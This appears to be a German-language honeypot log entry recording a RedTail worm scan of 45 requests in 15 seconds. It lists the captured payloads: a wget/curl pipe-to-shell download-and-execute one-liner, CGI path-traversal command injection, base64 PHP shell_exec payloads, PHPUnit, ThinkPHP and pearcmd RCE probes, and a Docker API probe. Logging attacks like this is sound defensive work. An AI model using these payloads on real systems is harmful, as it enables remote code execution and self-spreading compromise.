04.08.2026 · self-replicating worm · RedTail · 45 Anfragen · Dauer 15 s · Vereinigte Staaten
45 Anfragen in 15 s von [IP], User-Agent libredtail-http. Signaturen: CVE-2017-9841, CGI/Shellshock, Docker-API, PHP-shell_exec, Malware-Dropper.
(wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s cve_2024_4577.selfrep
root@srv01:~$ POST /cgi-bin/../../../../../../../../../../bin/sh (wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s apache.selfrep root@srv01:~$ POST /hello.world <?php shell_exec(base64_decode("[Token]")); echo(md5("Hello CVE-2024-4577")); ?> root@srv01:~$ POST / <?php shell_exec(base64_decode("[Token]")); echo(md5("Hello CVE-2024-4577")); ?> root@srv01:~$ GET [Token].php?<?php echo(md5("Hello PHPUnit")); root@srv01:~$ GET /vendor/phpunit/src/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit")); root@srv01:~$ GET /vendor/phpunit/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit")); root@srv01:~$ GET /phpunit/phpunit/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit")); root@srv01:~$ GET /phpunit/src/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit")); root@srv01:~$ GET /phpunit/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit")); root@srv01:~$ GET /lib/phpunit/src/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit")); root@srv01:~$ GET /lib/phpunit/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit")); root@srv01:~$ GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello root@srv01:~$ GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello root@srv01:~$ GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5("hi"));?>+/tmp/index1.php root@srv01:~$ GET /index.php?lang=../../../../../../../../tmp/index1 root@srv01:~$ GET /containers/json
| Zeit | Methode | Pfad / Payload | Muster |
|---|---|---|---|
| +0 s | POST | /cgi-bin/../../../../../../../../../../bin/sh(wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s apache.selfrep | Command-Injection |
| +0 s | POST | /hello.world<?php shell_exec(base64_decode("[Token]")); echo(md5("Hello CVE-2024-4577")); ?> | |
| +1 s | POST | /<?php shell_exec(base64_decode("[Token]")); echo(md5("Hello CVE-2024-4577")); ?> | |
| +1 s | GET | [Token].php?<?php echo(md5("Hello PHPUnit")); | Shell-/RCE-Probe |
| +2 s | GET | /vendor/phpunit/src/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit")); | Shell-/RCE-Probe |
| +3 s | GET | /vendor/phpunit/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit")); | Shell-/RCE-Probe |
| +4 s | GET | /phpunit/phpunit/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit")); | Shell-/RCE-Probe |
| +5 s | GET | /phpunit/src/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit")); | Shell-/RCE-Probe |
| +5 s | GET | /phpunit/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit")); | Shell-/RCE-Probe |
| +6 s | GET | /lib/phpunit/src/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit")); | Shell-/RCE-Probe |
| +6 s | GET | /lib/phpunit/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit")); | Shell-/RCE-Probe |
| +13 s | GET | /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello | PHP-Scan |
| +13 s | GET | /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello | PHP-Scan |
| +14 s | GET | /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5("hi"));?>+/tmp/index1.php | PHP-Scan |
| +14 s | GET | /index.php?lang=../../../../../../../../tmp/index1 | PHP-Scan |
| +15 s | GET | /containers/json |